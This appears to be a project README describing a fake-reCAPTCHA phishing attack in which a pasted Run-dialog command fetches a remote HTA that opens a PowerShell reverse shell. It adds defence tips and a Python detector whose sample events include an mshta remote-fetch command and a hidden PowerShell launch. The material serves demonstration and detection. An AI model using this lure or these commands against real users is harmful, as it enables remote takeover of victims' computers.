
Fake reCAPTCHA - Reverse Shell

Author: Mario Ritter

About this project

The entire project, created by the great John Hammond, can be found here: https://github.com/JohnHammond/recaptcha-phish.

This project demonstrates an attack using a fake reCAPTCHA, which deceptively leads the user to execute malicious code.

What is HTA?

HTA (HTML Application) is a type of application that uses HTML and scripting languages like VBScript or JScript. HTA files have the .hta extension and can be run directly on Windows as native applications. Unlike regular HTML code, HTA applications don't have the same security restrictions as web applications—they can perform local operations such as launching programs or modifying system files.

This makes them a dangerous tool for attackers, who only need to trick a user into opening one to execute malicious code, such as a reverse shell.

The Attack

I modified a VBA script in the HTA file to provide a reverse shell through PowerShell. The HTA file is downloaded and executed from an external source, allowing the attacker to gain access to the victim's system.

Video Description

The user (victim) visits a phishing website simulating a reCAPTCHA. Once they check the box, they are prompted to open the Run dialog (Win + R) and enter a prepared command. This command appears harmless at first, but it contains a hidden part that is not visible when it is copied. When the victim pastes and runs the command, the hidden part is triggered and launches the HTA file from an external link. Once the HTA file is executed, the VBA script containing the PowerShell reverse shell runs, giving the attacker remote access to the victim's computer.

How to defend

  • Never run commands from external, untrusted websites: Any command from an unknown or suspicious source can contain hidden malicious code.

  • Disable macros and HTA in your system: Disabling macro scripts in applications and restricting the execution of HTA files minimizes the risk of running malicious code.

  • Use up-to-date antivirus software and security tools: These tools often block attempts to run dangerous HTA or scripts.
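The chain described above leaves a recognisable trace in process-creation telemetry: the Run dialog is a child of explorer.exe, HTA files are hosted by mshta.exe, and here mshta.exe is handed a remote URL and then spawns a hidden PowerShell. The following is an added example written for this post (not code from the original project) that flags that pattern in records shaped like Sysmon Event ID 1. All events and the URL are constructed sample data; a local .hta opened from Explorer is included to show that it is deliberately not flagged on its own.

```python
"""Added example (not from the original post): flag the process chain the post
describes, Run dialog (explorer.exe) -> mshta.exe fetching a remote .hta ->
PowerShell, from process-creation records such as Sysmon Event ID 1.
All events below are constructed sample data; the URL is a placeholder."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# Constructed sample: one benign local HTA run and one ClickFix-style chain.
SAMPLE_EVENTS = [
    ProcEvent(1000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Benign: a vendor's local .hta opened from Explorer (no URL, no shell child).
    ProcEvent(1500, 1000, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),
    # Suspicious: typed into Win+R, pulls an HTA from a remote host...
    ProcEvent(2000, 1000, r"C:\Windows\System32\mshta.exe",
              "mshta https://captcha.example.invalid/verify.hta"),  # constructed URL
    # ...and the HTA's script launches a hidden PowerShell (payload omitted).
    ProcEvent(3000, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -nop -c "<payload omitted>"'),
]

URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
# Flags that make a PowerShell child non-interactive or invisible to the victim.
HIDDEN_RE = re.compile(
    r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|e(?:nc|ncodedcommand)?\b|ep\s+bypass)",
    re.IGNORECASE,
)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def image_name(path: str) -> str:
    """Return the lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_suspicious_mshta(events):
    """Return {mshta_pid: [reasons]} for mshta.exe processes that either load a
    remote URL or spawn a command shell. A local .hta opened from Explorer with
    no shell child produces no finding, so the explorer.exe parent is only
    reported as supporting context, never as the sole trigger."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for e in events:
        if image_name(e.image) != "mshta.exe":
            continue
        reasons = []
        if URL_RE.search(e.cmdline):
            reasons.append("mshta.exe launched with a remote URL")
        for child in (c for c in events if c.ppid == e.pid):
            name = image_name(child.image)
            if name in SHELLS:
                reasons.append(f"mshta.exe spawned {name}")
                if HIDDEN_RE.search(child.cmdline):
                    reasons.append(f"{name} uses hidden/non-interactive flags")
        if not reasons:
            continue
        parent = by_pid.get(e.ppid)
        if parent is not None and image_name(parent.image) == "explorer.exe":
            reasons.append("parent is explorer.exe (consistent with a Run-dialog launch)")
        findings[e.pid] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in find_suspicious_mshta(SAMPLE_EVENTS).items():
        print(f"mshta.exe pid {pid}:")
        for r in reasons:
            print(f"  - {r}")
```

Run against the sample, only the mshta.exe process with pid 2000 is reported, with four reasons (remote URL, PowerShell child, hidden flags, explorer.exe parent). The same logic maps directly onto an EDR or SIEM query over real Sysmon or Security 4688 events; in a real environment the URL and hidden-flag checks do the discriminating work, since mshta.exe under explorer.exe is also what a double-clicked local HTA looks like.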

kawaii
       /\_/\
      ( o.o )
       > ^ <

Due to lack of time, translated via DeeplAI. Sooooory :((